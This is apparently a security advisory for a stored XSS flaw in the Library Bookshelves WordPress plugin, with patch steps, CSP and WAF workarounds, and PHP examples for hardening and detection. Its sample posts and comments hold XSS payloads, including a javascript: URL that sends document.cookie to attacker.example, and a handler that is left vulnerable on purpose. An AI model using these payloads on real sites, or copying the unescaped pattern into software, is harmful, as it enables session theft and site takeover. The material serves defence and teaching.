CVE-2024-13464

6.4 MEDIUM

📋 TL;DR

This stored XSS vulnerability in the Library Bookshelves WordPress plugin lets authenticated attackers with contributor-level access or higher inject malicious scripts through the attributes of the 'bookshelf' shortcode, which are neither sanitized on input nor escaped on output. The injected script runs in the browser of every user who views the affected page, including administrators, and can steal session cookies or redirect visitors. All WordPress sites running this plugin at version 5.9 or earlier are affected.

💻 Affected Systems

Products:
  • WordPress Library Bookshelves plugin
Versions: All versions up to and including 5.9
Operating Systems: All operating systems running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress installation with the Library Bookshelves plugin enabled. Contributor-level access or higher needed for exploitation.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, take over the WordPress site, install backdoors, deface pages, or redirect visitors to malicious sites.

🟠

Likely Case

Attackers inject malicious scripts to steal user session cookies, redirect visitors to phishing pages, or display unwanted advertisements.

🟢

If Mitigated

With proper user access controls and content security policies, impact is limited to defacement or minor disruption of affected pages.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access but is straightforward once attacker has contributor privileges. Public proof-of-concept demonstrates the injection technique.
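The pattern behind a shortcode-attribute stored XSS, shown as an added illustration rather than code from the Library Bookshelves plugin: the handler name, the `title` and `width` attributes and the markup are hypothetical, and the real handler is in the plugin's functions.php linked under Fix & Mitigation. A contributor cannot post raw `<script>` tags (WordPress strips them from untrusted users' content), but a quote character inside a shortcode attribute survives that filtering and, if the handler concatenates it into HTML, breaks out of the attribute at render time.

```php
<?php
// Added illustration, not code from the Library Bookshelves plugin.
// Handler names, attribute names (title, width) and the markup are hypothetical.

// VULNERABLE: attribute values are concatenated straight into HTML.
// A contributor who writes
//   [bookshelf title='" onmouseover="alert(document.cookie)']
// gets a div whose title attribute is closed early, followed by a live
// event handler, and it fires for every visitor who hovers the shelf.
function example_bookshelf_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'title' => 'Shelf', 'width' => '300' ), $atts, 'bookshelf' );
    return '<div class="bookshelf" style="width:' . $atts['width'] . 'px" title="' . $atts['title'] . '">'
         . $atts['title'] . '</div>';
}

// HARDENED: each value is sanitized on input and escaped for the context
// it lands in, so a quote becomes &quot; inside the attribute and the
// break-out never happens.
function example_bookshelf_hardened( $atts ) {
    $atts  = shortcode_atts( array( 'title' => 'Shelf', 'width' => '300' ), $atts, 'bookshelf' );
    $width = absint( $atts['width'] );              // numeric context: coerce to an integer
    $title = sanitize_text_field( $atts['title'] ); // strip tags, control chars and extra whitespace
    return '<div class="bookshelf" style="width:' . esc_attr( $width ) . 'px" title="' . esc_attr( $title ) . '">'
         . esc_html( $title ) . '</div>';
}

// Only the hardened handler is registered; the vulnerable one is shown for contrast.
add_shortcode( 'bookshelf', 'example_bookshelf_hardened' );
```

The rule the hardened handler follows is the one the fix in any shortcode plugin has to follow: `esc_attr()` for values inside an attribute, `esc_html()` for values between tags, `absint()` or a whitelist for values that feed CSS or URLs, applied at the point of output rather than trusting that input filtering happened upstream.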

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.0 or later

Vendor Fix Reference (plugin source, functions.php): https://plugins.trac.wordpress.org/browser/library-bookshelves/trunk/functions.php#L681

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Library Bookshelves plugin.
4. Click 'Update Now' if an update is available.
5. If no update is offered, deactivate and delete the plugin, then install version 6.0 or later fresh from the WordPress plugin repository.

🔧 Temporary Workarounds

Remove Contributor Access

Platform: all

Temporarily restrict contributor-level users from creating or editing posts until the patch is applied. This only prevents new injections: any post that already contains a malicious 'bookshelf' shortcode keeps executing it for viewers, so search existing post content for '[bookshelf' and review the attributes before lifting the restriction.

Implement Content Security Policy

Platform: all

Add a CSP header so the browser refuses inline scripts and inline event handlers, which is what this bug injects. Test with Content-Security-Policy-Report-Only first: `script-src 'self'` also blocks legitimate inline scripts from themes and plugins, and the WordPress admin interface depends on them, so the header must not be sent on wp-admin pages.

Add to .htaccess (requires mod_headers): Header always set Content-Security-Policy "default-src 'self'; script-src 'self'"
Or send it from PHP on front-end requests only (a must-use plugin hooked to `send_headers`, not wp-config.php, which would also apply it to the admin): header("Content-Security-Policy: default-src 'self'; script-src 'self'");
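A must-use plugin that sends the policy in report-only mode first, as an added example that is not part of the plugin or the advisory. It assumes the front end needs no inline scripts (if it does, the report-only run will show the violations); the file name, constant and policy string are choices for this example.

```php
<?php
/**
 * Plugin Name: CSP stopgap for CVE-2024-13464
 *
 * Added example, not code from the Library Bookshelves plugin.
 * Save as wp-content/mu-plugins/csp-stopgap.php; mu-plugins load without activation.
 */

// Start in report-only mode. Flip to false only after the browser console /
// report endpoint shows no violations from your own theme and plugins.
define( 'EXAMPLE_CSP_REPORT_ONLY', true );

// 'send_headers' fires in the front-end request lifecycle (index.php -> wp()),
// not for wp-admin or wp-login.php, so core admin pages that rely on inline
// scripts keep working while public pages get the policy.
add_action( 'send_headers', function () {
    $policy = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
    $name   = EXAMPLE_CSP_REPORT_ONLY
        ? 'Content-Security-Policy-Report-Only'
        : 'Content-Security-Policy';
    header( $name . ': ' . $policy );
} );
```

With `script-src 'self'` and no `'unsafe-inline'`, an injected `onmouseover="..."` handler or `javascript:` URL is refused by the browser even though the markup is still served; the payload stays in the database until the post is cleaned and the plugin updated, so this is a stopgap, not a fix.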

🧯 If You Can't Patch

  • Disable the Library Bookshelves plugin completely; once it is deactivated the shortcode is no longer expanded and renders as plain text
  • Implement web application firewall rules that block post-save requests (post.php, admin-ajax.php, the REST wp/v2/posts endpoint) whose content contains a 'bookshelf' shortcode with quotes, angle brackets, an on*= event handler or javascript: inside an attribute

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Installed Plugins. If Library Bookshelves version is 5.9 or lower, you are vulnerable.

Check Version:

wp plugin list --name=library-bookshelves --field=version (if WP-CLI installed)

Verify Fix Applied:

After updating, verify plugin version shows 6.0 or higher in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • Unusual shortcode modifications in post/page edit logs
  • Multiple failed login attempts followed by successful contributor login

Network Indicators:

  • Inline event handlers (onmouseover, onerror, onclick) or script tags inside the rendered bookshelf markup in HTTP responses
  • External script loads or redirects originating from pages that use the bookshelf shortcode

SIEM Query:

source="wordpress.log" AND ("bookshelf" AND ("script" OR "onerror" OR "onmouseover" OR "onclick" OR "javascript:"))
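The indicators above applied to stored post content, as an added example that is not code from the plugin or from any advisory. It parses 'bookshelf' shortcode attributes the way WordPress does (double-quoted, single-quoted and bare values) and flags values that could only be a payload; the function names are hypothetical and the three sample posts are constructed, not real site data.

```php
<?php
// Added example, not code from the Library Bookshelves plugin or any vendor advisory.
// Scans post content for [bookshelf ...] tags whose attribute values look like
// an attribute break-out or script injection. Sample posts below are constructed.

/** Raw attribute strings of every [bookshelf ...] tag in $content. */
function example_bookshelf_tags( string $content ): array {
    preg_match_all( '/\[bookshelf\b([^\]]*)\]/i', $content, $m );
    return $m[1];
}

/** Minimal key="value" / key='value' / key=value parser in the style of shortcode_parse_atts(). */
function example_parse_atts( string $attrs ): array {
    $out = array();
    $re  = '/([\w-]+)\s*=\s*"([^"]*)"|([\w-]+)\s*=\s*\'([^\']*)\'|([\w-]+)\s*=\s*([^\s\'"]+)/';
    preg_match_all( $re, $attrs, $matches, PREG_SET_ORDER );
    foreach ( $matches as $m ) {
        if ( ! empty( $m[1] ) ) {
            $out[ strtolower( $m[1] ) ] = $m[2];
        } elseif ( ! empty( $m[3] ) ) {
            $out[ strtolower( $m[3] ) ] = $m[4];
        } elseif ( ! empty( $m[5] ) ) {
            $out[ strtolower( $m[5] ) ] = $m[6];
        }
    }
    return $out;
}

/** Reasons one attribute value looks like an XSS payload; an empty array means clean. */
function example_suspicious_reasons( string $value ): array {
    $checks = array(
        'quote or angle bracket (attribute break-out / new tag)' => '/["\'<>]/',
        'inline event handler'                                   => '/\bon[a-z]+\s*=/i',
        'javascript: URL'                                        => '/javascript\s*:/i',
    );
    $reasons = array();
    foreach ( $checks as $label => $re ) {
        if ( preg_match( $re, $value ) ) {
            $reasons[] = $label;
        }
    }
    return $reasons;
}

/** Scan [post_id => content] and return one finding per suspicious attribute. */
function example_scan_posts( array $posts ): array {
    $findings = array();
    foreach ( $posts as $post_id => $content ) {
        foreach ( example_bookshelf_tags( $content ) as $attrs ) {
            foreach ( example_parse_atts( $attrs ) as $name => $value ) {
                $reasons = example_suspicious_reasons( $value );
                if ( $reasons ) {
                    $findings[] = array( 'post' => $post_id, 'attr' => $name, 'value' => $value, 'why' => $reasons );
                }
            }
        }
    }
    return $findings;
}

// Constructed sample content: post 1 is benign, post 2 carries the classic
// attribute break-out, post 3 smuggles a javascript: URL into a link attribute.
$sample_posts = array(
    1 => 'Our reading list: [bookshelf title="Summer picks" width="300"]',
    2 => '[bookshelf title=\'" onmouseover="alert(document.cookie)\' width="300"]',
    3 => 'Links: [bookshelf title="Classics" link="javascript:fetch(\'//attacker.example/?c=\'+document.cookie)"]',
);

foreach ( example_scan_posts( $sample_posts ) as $f ) {
    printf( "post %d: attribute '%s' = %s  [%s]\n",
        $f['post'], $f['attr'], json_encode( $f['value'] ), implode( '; ', $f['why'] ) );
}
```

To run the same checks against a live site, replace `$sample_posts` with the result of `get_posts( array( 'post_type' => 'any', 'post_status' => 'any', 'posts_per_page' => -1, 's' => '[bookshelf' ) )` keyed by ID and execute the file with `wp eval-file`; the parsing and the three checks stay the same. Quotes and angle brackets are flagged outright because no legitimate shelf title or width needs them, which keeps the rule simple and the false-positive rate low.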
